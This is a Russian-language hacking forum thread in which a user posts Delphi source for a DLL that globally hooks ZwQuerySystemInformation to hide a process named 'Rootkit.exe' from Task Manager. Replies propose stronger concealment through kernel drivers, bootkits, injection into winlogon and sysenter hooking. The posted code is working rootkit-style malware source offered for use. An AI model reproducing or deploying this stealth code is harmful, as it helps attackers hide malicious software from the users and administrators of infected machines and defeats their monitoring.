перехват ZwQuerySystemInformation

[ Новые сообщения · Участники · Правила форума · Поиск · RSS ]

Страница 1 из 1 1
Модератор форума: Волк-1024, Anton93, xXxSh@dowxXx

перехват ZwQuerySystemInformation (API)

oke

Дата: Вторник, 12.06.2012, 22:31 | Сообщение # 1

Постоянный

Зарегистрирован: 15.01.2012

Группа: Пользователи

Сообщений: 124

Статус: Offline

прячемся от диспетчера задач

Code

library HideDLL;

uses
    Windows,
    ExtendedAPIFunctions,
    apihooktools;

const
    MutexName='__API_HOOK';

var
    SH:HHOOK;
    HiddenProcess:string = 'Rootkit.exe';

    SystemFunctionBridge:TFunctionRestoreData;

function NewSystemFunction(ASystemInformationClass: DWORD; ASystemInformation: Pointer;
     ASystemInformationLength: DWORD; AReturnLength:PCardinal): NTStatus; stdcall;
var
    info,back_Proc:PSYSTEM_PROCESSES;
begin
    UnHookCodeHook(@SystemFunctionBridge);
    Result:=ZwQuerySystemInformation(ASystemInformationClass,ASystemInformation,ASystemInformationLength,AReturnLength);
    SetCodeHook(SystemFunctionBridge.Address,@NewSystemFunction,@SystemFunctionBridge);
    if ASystemInformationClass<>SystemProcessesAndThreadsInformation then exit;
    if Result<>STATUS_SUCCESS then exit;
    info:= ASystemInformation;
    repeat
      if info^.ProcessName.Buffer = HiddenProcess then
       begin
        back_Proc^.NextEntryDelta:=back_Proc^.NextEntryDelta+info^.NextEntryDelta;
       end;
      back_Proc:=info;
      Info := pointer(dword(info) + info^.NextEntryDelta);
    until Info^.NextEntryDelta = 0;
end;

function MsgProc(code:DWORD;wParam,lparam:DWORD):DWORD;stdcall;
begin
    CallNextHookEx(SH,code,wParam,lparam);
end;
procedure SetWindowsHook(e:Boolean); stdcall;
var
    M:THandle;
begin
    if e then
     begin
      m:=CreateMutex(0,false,MutexName);
      if m=0 then exit;
      SH:=SetWindowsHookEx(WH_GETMESSAGE,@MsgProc,HInstance,0);
     end
         else
      UnhookWindowsHookEx(sh);
end;

procedure DLLEntryPoint(dwReason:DWord);
begin
    case dwReason of
      DLL_PROCESS_ATTACH:
       begin
       // StopProcess(GetCurrentProcessId);
        SetWindowsHook(true);
        SetProcedureHook(GetModuleHandle('ntdll.dll'),'ZwQuerySystemInformation',@NewSystemFunction,@SystemFunctionBridge);
       // ResumeProcess(GetCurrentProcessId);
       end;
      DLL_PROCESS_DETACH:
       begin
       // StopProcess(GetCurrentProcessId);
        SetWindowsHook(false);
        UnHookCodeHook(@SystemFunctionBridge);
        //ResumeProcess(GetCurrentProcessId);
       end;
     end;
end;

begin
     DllProc:= @DLLEntryPoint;
     DLLEntryPoint(DLL_PROCESS_ATTACH);
end.

вот и модули

Прикрепления: apihooktools.pas (8.5 Kb) · ExtendedAPIFunc.pas (5.9 Kb)

Сообщение отредактировал oke - Вторник, 12.06.2012, 22:33

Neo

Дата: Среда, 13.06.2012, 09:01 | Сообщение # 2

Модератор

Зарегистрирован: 04.05.2010

Группа: Модераторы

Сообщений: 317

Статус: Offline

Так не интересно.....Из третьего кольца прятать процесс.....А набери в cmd tasklist.Ты увидешь свою прогу.
Надо хукать из ring 0,писать драйвер режима ядра.Тогда и tasklist не покажет.

oke

Дата: Среда, 13.06.2012, 09:15 | Сообщение # 3

Постоянный

Зарегистрирован: 15.01.2012

Группа: Пользователи

Сообщений: 124

Статус: Offline

Neo, да и вроде другие менеджеры видят

xXxSh@dowxXx

Дата: Среда, 13.06.2012, 10:32 | Сообщение # 4

Авторитетный

Зарегистрирован: 22.01.2012

Группа: Модераторы

Сообщений: 702

Статус: Offline

Quote (oke)

да и вроде другие менеджеры видят

конечно видят, я диспетчером задач уже давно пользуюсь только в тестовых целях, не более того...

Neo

Дата: Среда, 13.06.2012, 10:35 | Сообщение # 5

Модератор

Зарегистрирован: 04.05.2010

Группа: Модераторы

Сообщений: 317

Статус: Offline

Лучше всего процесс и не создавать.Вот буткиты как делают,они пишут по-байтно рабочий код в сектор,который дальше чем раздел диска(там место для этого точно хватит и оно ни кем не используется),потом при загрузки считывают этот код и он в памяти,прям как в старые досовские времена smile

Так что давай лучше буткит писать.

dolphin

Дата: Среда, 13.06.2012, 16:09 | Сообщение # 6

Администратор

Сообщений: 906

Статус: Offline

А кто знает как сделать так чтобы в диспетчере задач вообще не отображались процессы?

xXxSh@dowxXx

Дата: Среда, 13.06.2012, 16:40 | Сообщение # 7

Авторитетный

Зарегистрирован: 22.01.2012

Группа: Модераторы

Сообщений: 702

Статус: Offline

Quote (dolphin)

А кто знает как сделать так чтобы в диспетчере задач вообще не отображались процессы?

помоему Neo уже где то писал статью о том какие функции за это могут отвечать, если я не ошибаюсь, но где то точно видел, нада поискать...

Quote (Neo)

Вот буткиты как делают,они пишут по-байтно рабочий код в сектор,который дальше чем раздел диска(там место для этого точно хватит и оно ни кем не используется),потом при загрузки считывают этот код и он в памяти

а он разве остается в памяти уже после загрузки винды, когда юзер зашел под своей учетной записью, и так же функционирует?
на сколько мне известно, буткиты используют определенный участок памяти для загрузки кода, и по функционалу в период запуска операционной системы он очень ограничен, не будет же нашь код начинать работу пока пользователь не вошел в свою учетку?, хотя я в буткитах не очень разбираюсь, и толком не представляю как они работают, но было бы очень интересно собрать что то подобное...

Сообщение отредактировал xXxSh@dowxXx - Среда, 13.06.2012, 16:46

vvova15

Дата: Среда, 13.06.2012, 19:01 | Сообщение # 8

Участник

Зарегистрирован: 24.04.2010

Группа: Пользователи

Сообщений: 83

Статус: Offline

Quote

А кто знает как сделать так чтобы в диспетчере задач вообще не отображались процессы?

диспетчер получает список процессов через zwquerysysteminformation.
по идее надо хукать sysenter , получать указатель EPROCESS процесса, который вызвал в обработчике, и если это диспетчер, то слать его нах

Сообщение отредактировал vvova15 - Четверг, 14.06.2012, 20:54

oke

Дата: Четверг, 14.06.2012, 14:41 | Сообщение # 9

Постоянный

Зарегистрирован: 15.01.2012

Группа: Пользователи

Сообщений: 124

Статус: Offline

vvova15, если вроде перехватывать все сообщения то диспетчер тупо виснит

XSPY

Дата: Четверг, 14.06.2012, 19:55 | Сообщение # 10

Продвинутый

Зарегистрирован: 28.01.2010

Группа: Пользователи

Сообщений: 263

Статус: Offline

dolphin, в плане?
как вариант-инжект в один процесс (например,ATI или winlogon...) а свой удаляешь и работаешь от него...
или же руткит)) он любой процесс скроет...

vvova15

Дата: Четверг, 14.06.2012, 21:05 | Сообщение # 11

Участник

Зарегистрирован: 24.04.2010

Группа: Пользователи

Сообщений: 83

Статус: Offline

кстати про хукинг системных сервисов недавно писал http://sysprogramming.ru/?p=92 )
если конкретный процесс скрыть вообще то просто похукать zwquerysysteminformation,
а если именно от диспетчера и именно все, то см. мой предыдущий пост. правда с sysenter заморочки есть:
прикол в том что sysenter это уже не юзермодный режим но и не режим ядра, и придется чтобы перейти в ring0, вручную прогружать ядреный стэк, перезаугржать селекторы юзермодных SS,DS и много другой херни. потом ты попадеш контекст процесса, вызвавшего sysenter и уже сможеш получить id Процесса функцией psgetcurrrentprocessid. ну а потом проверить какой процесс запросил вызов zwquerysysteminformation и сравнить с id Диспетчера задач

Сообщение отредактировал vvova15 - Четверг, 14.06.2012, 21:08

XSPY

Дата: Четверг, 14.06.2012, 22:41 | Сообщение # 12

Продвинутый

Зарегистрирован: 28.01.2010

Группа: Пользователи

Сообщений: 263

Статус: Offline

vvova15, спасибо,интересное чтиво))

перехват ZwQuerySystemInformation (API)

Страница 1 из 1
1